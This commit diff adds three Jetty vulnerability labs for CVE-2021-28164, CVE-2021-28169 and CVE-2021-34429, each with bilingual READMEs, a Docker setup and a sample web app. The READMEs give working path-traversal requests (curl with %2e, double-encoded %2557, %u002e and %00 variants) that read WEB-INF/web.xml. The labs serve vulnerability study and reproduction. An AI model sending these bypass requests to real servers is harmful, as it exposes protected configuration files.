first commit

jetty/CVE-2021-28164/README.md

@@ -0,0 +1,40 @@
+# Jetty Ambiguous Paths Information Disclosure Vulnerability (CVE-2021-28164)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Eclipse Jetty is a Java web server and Java Servlet container.
+
+Jetty release 9.4.37 introduced a more precise implementation of RFC3986 with regards to URI decoding, together with some new compliance modes to optionally allow support of some URI that may have ambiguous interpretation within the Servlet specified API methods behaviours. The default mode allowed % encoded . characters to be excluded for URI normalisation, which is correct by the RFC, but is not assumed by common Servlet implementations.
+
+The default compliance mode allows requests with URIs that contain `%2e` or `%2e%2e` segments to access protected resources within the WEB-INF directory. For example a request to `/context/%2e/WEB-INF/web.xml` can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application.
+
+This bug is fixed on version 9.4.39.
+
+Reference links.
+
+- https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5
+- https://xz.aliyun.com/t/10039
+
+## Vulnerable Application
+
+Execute the following command to start a Jetty 9.4.37 server.
+
+```
+docker compose up -d
+```
+
+After the server starts, visit ``http://your-ip:8080`` to see an example page.
+
+## Exploit
+
+The sensitive file web.xml is not accessible through `/WEB-INF/web.xml`.
+
+![](1.png)
+
+Use `%2e/` to bypass the restriction:
+
+```
+curl -v 'http://192.168.1.162:8080/%2e/WEB-INF/web.xml'
+```
+
+![](2.png)

jetty/CVE-2021-28164/README.zh-cn.md

@@ -0,0 +1,34 @@
+# Jetty WEB-INF 敏感信息泄露漏洞（CVE-2021-28164）
+
+Eclipse Jetty是一个开源的servlet容器，它为基于Java的Web容器提供运行环境。
+
+Jetty 9.4.37引入对RFC3986的新实现，而URL编码的`.`字符被排除在URI规范之外，这个行为在RFC中是正确的，但在servlet的实现中导致攻击者可以通过`%2e`来绕过限制，下载WEB-INF目录下的任意文件，导致敏感信息泄露。该漏洞在9.4.39中修复。
+
+参考链接：
+
+- https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5
+- https://xz.aliyun.com/t/10039
+
+## 漏洞环境
+
+执行如下命令启动一个Jetty 9.4.37：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问`http://your-ip:8080`可以查看到一个example页面。
+
+## 漏洞复现
+
+直接访问`/WEB-INF/web.xml`将会返回404页面：
+
+![](1.png)
+
+使用`%2e/`来绕过限制下载web.xml：
+
+```
+curl -v 'http://192.168.1.162:8080/%2e/WEB-INF/web.xml'
+```
+
+![](2.png)

jetty/CVE-2021-28164/docker-compose.yml

@@ -0,0 +1,8 @@
+version: '2.2'
+services:
+  web:
+    image: vulhub/jetty:9.4.37
+    ports:
+      - "8080:8080"
+    volumes: 
+      - ./src:/opt/jetty/webapps/ROOT

jetty/CVE-2021-28164/src/WEB-INF/web.xml

@@ -0,0 +1,7 @@
+<!DOCTYPE web-app PUBLIC
+ "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
+ "http://java.sun.com/dtd/web-app_2_3.dtd" >
+
+<web-app>
+  <display-name>Archetype Created Web Application</display-name>
+</web-app>

jetty/CVE-2021-28164/src/index.jsp

@@ -0,0 +1,47 @@
+
+<!doctype html>
+<html>
+<head>
+    <title>Example Domain</title>
+
+    <meta charset="utf-8" />
+    <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
+    <meta name="viewport" content="width=device-width, initial-scale=1" />
+    <style type="text/css">
+        body {
+            background-color: #f0f0f2;
+            margin: 0;
+            padding: 0;
+            font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;
+            
+        }
+        div {
+            width: 600px;
+            margin: 5em auto;
+            padding: 2em;
+            background-color: #fdfdff;
+            border-radius: 0.5em;
+            box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);
+        }
+        a:link, a:visited {
+            color: #38488f;
+            text-decoration: none;
+        }
+        @media (max-width: 700px) {
+            div {
+                margin: 0 auto;
+                width: auto;
+            }
+        }
+    </style>
+</head>
+
+<body>
+<div>
+    <h1><% out.println("Example Domain"); %></h1>
+    <p>This domain is for use in illustrative examples in documents. You may use this
+    domain in literature without prior coordination or asking for permission.</p>
+    <p><a href="https://www.iana.org/domains/example">More information...</a></p>
+</div>
+</body>
+</html>

jetty/CVE-2021-28169/README.md

@@ -0,0 +1,39 @@
+# Jetty Utility Servlets ConcatServlet Double Decoding Information Disclosure Vulnerability (CVE-2021-28169)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Eclipse Jetty is a Java web server and Java Servlet container.
+
+Before version 9.4.40, 10.0.2, 11.0.2, the `ConcatServlet` and `WelcomeFilter` classes in Jetty Servlets are influenced by a double decoding bug. If developers use these two classes manually, attackers can use them to download arbitrary sensitive files in the WEB-INF directory.
+
+Reference links.
+
+- https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq
+
+## Vulnerable Application
+
+Execute the following command to start a Jetty 9.4.40 server.
+
+```
+docker compose up -d
+```
+
+After the server starts, visit ``http://your-ip:8080`` to see an example page. This page uses the `ConcatServlet` to optimize the loading of static files:
+
+```
+<link rel="stylesheet" href="/static?/css/base.css&/css/app.css">
+```
+
+## Exploit
+
+The sensitive file web.xml is not accessible through `/static?/WEB-INF/web.xml`.
+
+![](1.png)
+
+Double URL encoding `W` to bypass the restriction:
+
+```
+curl -v 'http://your-ip:8080/static?/%2557EB-INF/web.xml'
+```
+
+![](2.png)

jetty/CVE-2021-28169/README.zh-cn.md

@@ -0,0 +1,37 @@
+# Jetty 通用 Servlets 组件 ConcatServlet 信息泄露漏洞（CVE-2021-28169）
+
+Eclipse Jetty是一个开源的servlet容器，它为基于Java的Web容器提供运行环境，而Jetty Servlets是Jetty提供给开发者的一些通用组件。
+
+在9.4.40, 10.0.2, 11.0.2版本前，Jetty Servlets中的`ConcatServlet`、`WelcomeFilter`类存在多重解码问题，如果开发者主动使用了这两个类，攻击者可以利用其访问WEB-INF目录下的敏感文件，造成配置文件及代码泄露。
+
+参考链接：
+
+- https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq
+
+## 漏洞环境
+
+执行如下命令启动一个Jetty 9.4.40服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080`即可查看到一个example页面。该页面使用到了`ConcatServlet`来优化静态文件的加载：
+
+```
+<link rel="stylesheet" href="/static?/css/base.css&/css/app.css">
+```
+
+## 漏洞利用
+
+正常通过`/static?/WEB-INF/web.xml`无法访问到敏感文件web.xml：
+
+![](1.png)
+
+对字母`W`进行双URL编码，即可绕过限制访问web.xml：
+
+```
+curl -v 'http://your-ip:8080/static?/%2557EB-INF/web.xml'
+```
+
+![](2.png)

jetty/CVE-2021-28169/docker-compose.yml

@@ -0,0 +1,8 @@
+version: '2.2'
+services:
+  web:
+    image: vulhub/jetty:9.4.40
+    ports:
+      - "8080:8080"
+    volumes: 
+      - ./src:/opt/jetty/webapps/ROOT

jetty/CVE-2021-28169/src/WEB-INF/web.xml

@@ -0,0 +1,16 @@
+<!DOCTYPE web-app PUBLIC
+ "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
+ "http://java.sun.com/dtd/web-app_2_3.dtd" >
+
+<web-app>
+  <display-name>Archetype Created Web Application</display-name>
+  <servlet>
+    <servlet-name>Concat</servlet-name>
+    <servlet-class>org.eclipse.jetty.servlets.ConcatServlet</servlet-class>
+  </servlet>
+
+  <servlet-mapping>
+    <servlet-name>Concat</servlet-name>
+    <url-pattern>/static</url-pattern>
+  </servlet-mapping>
+</web-app>

jetty/CVE-2021-28169/src/css/app.css

@@ -0,0 +1,18 @@
+div {
+    width: 600px;
+    margin: 5em auto;
+    padding: 2em;
+    background-color: #fdfdff;
+    border-radius: 0.5em;
+    box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);
+}
+a:link, a:visited {
+    color: #38488f;
+    text-decoration: none;
+}
+@media (max-width: 700px) {
+    div {
+        margin: 0 auto;
+        width: auto;
+    }
+}

jetty/CVE-2021-28169/src/css/base.css

@@ -0,0 +1,7 @@
+body {
+    background-color: #f0f0f2;
+    margin: 0;
+    padding: 0;
+    font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;
+    
+}

jetty/CVE-2021-28169/src/index.jsp

@@ -0,0 +1,21 @@
+
+<!doctype html>
+<html>
+<head>
+    <title>Example Domain</title>
+
+    <meta charset="utf-8" />
+    <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
+    <meta name="viewport" content="width=device-width, initial-scale=1" />
+    <link rel="stylesheet" href="/static?/css/base.css&/css/app.css">  
+</head>
+
+<body>
+<div>
+    <h1><% out.println("Example Domain"); %></h1>
+    <p>This domain is for use in illustrative examples in documents. You may use this
+    domain in literature without prior coordination or asking for permission.</p>
+    <p><a href="https://www.iana.org/domains/example">More information...</a></p>
+</div>
+</body>
+</html>

jetty/CVE-2021-34429/README.md

@@ -0,0 +1,40 @@
+# Jetty Ambiguous Paths Information Disclosure Vulnerability (CVE-2021-34429)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Eclipse Jetty is a Java web server and Java Servlet container.
+
+Jetty 9.4.40 fixed an ambiguous paths information disclosure vulnerability [CVE-2021-28164](https://github.com/vulhub/vulhub/tree/master/jetty/CVE-2021-28164), CVE-2021-34429 is a variation and bypass of it.
+
+There are 3 types of payload that exfiltrate the content of `WEB-INF/web.xml`:
+
+- Unicode based URL encoded: `/%u002e/WEB-INF/web.xml`
+- `\0` with `.` bug:  `/.%00/WEB-INF/web.xml`
+- `\0` with `..` bug: `/a/b/..%00/WEB-INF/web.xml`
+
+The vulnerability affects the Jetty 9.4.37-9.4.42, 10.0.1-10.0.5, 11.0.1-11.0.5.
+
+References:
+
+- https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm
+- https://xz.aliyun.com/t/10039
+
+## Vulnerable Application
+
+Execute the following command to start a Jetty 9.4.40 server.
+
+```
+docker compose up -d
+```
+
+After the server starts, visit ``http://your-ip:8080`` to see an example page.
+
+## Exploit
+
+The sensitive file web.xml is not accessible through `/WEB-INF/web.xml`.
+
+![](1.png)
+
+Use payload `/%u002e/WEB-INF/web.xml` to bypass the restriction:
+
+![](2.png)

jetty/CVE-2021-34429/README.zh-cn.md

@@ -0,0 +1,36 @@
+# Jetty WEB-INF 敏感信息泄露漏洞（CVE-2021-34429）
+
+Eclipse Jetty是一个开源的servlet容器，它为基于Java的Web容器提供运行环境。
+
+Jetty在9.4.40后修复了因为`%2e`导致的敏感信息泄露漏洞[CVE-2021-28164](https://github.com/vulhub/vulhub/tree/master/jetty/CVE-2021-28164)，但这个修复是不完全的，通过下面三种方式可以进行绕过：
+
+- unicode形式URL编码：`/%u002e/WEB-INF/web.xml`
+- `\0`组合`.`导致的绕过：`/.%00/WEB-INF/web.xml`
+- `\0`组合`..`导致的绕过：`/a/b/..%00/WEB-INF/web.xml`
+
+影响版本：9.4.37-9.4.42, 10.0.1-10.0.5, 11.0.1-11.0.5
+
+参考链接：
+
+- https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm
+- https://xz.aliyun.com/t/10039
+
+## 漏洞环境
+
+执行如下命令启动一个Jetty 9.4.40：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问`http://your-ip:8080`可以查看到一个example页面。
+
+## 漏洞复现
+
+直接访问`/WEB-INF/web.xml`将会返回404页面：
+
+![](1.png)
+
+使用`/%u002e/WEB-INF/web.xml`来绕过限制下载web.xml：
+
+![](2.png)

jetty/CVE-2021-34429/docker-compose.yml

@@ -0,0 +1,8 @@
+version: '2.2'
+services:
+  web:
+    image: vulhub/jetty:9.4.40
+    ports:
+      - "8080:8080"
+    volumes: 
+      - ./src:/opt/jetty/webapps/ROOT

jetty/CVE-2021-34429/src/WEB-INF/web.xml

@@ -0,0 +1,7 @@
+<!DOCTYPE web-app PUBLIC
+ "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
+ "http://java.sun.com/dtd/web-app_2_3.dtd" >
+
+<web-app>
+  <display-name>Archetype Created Web Application</display-name>
+</web-app>

jetty/CVE-2021-34429/src/index.jsp

@@ -0,0 +1,47 @@
+
+<!doctype html>
+<html>
+<head>
+    <title>Example Domain</title>
+
+    <meta charset="utf-8" />
+    <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
+    <meta name="viewport" content="width=device-width, initial-scale=1" />
+    <style type="text/css">
+        body {
+            background-color: #f0f0f2;
+            margin: 0;
+            padding: 0;
+            font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;
+            
+        }
+        div {
+            width: 600px;
+            margin: 5em auto;
+            padding: 2em;
+            background-color: #fdfdff;
+            border-radius: 0.5em;
+            box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);
+        }
+        a:link, a:visited {
+            color: #38488f;
+            text-decoration: none;
+        }
+        @media (max-width: 700px) {
+            div {
+                margin: 0 auto;
+                width: auto;
+            }
+        }
+    </style>
+</head>
+
+<body>
+<div>
+    <h1><% out.println("Example Domain"); %></h1>
+    <p>This domain is for use in illustrative examples in documents. You may use this
+    domain in literature without prior coordination or asking for permission.</p>
+    <p><a href="https://www.iana.org/domains/example">More information...</a></p>
+</div>
+</body>
+</html>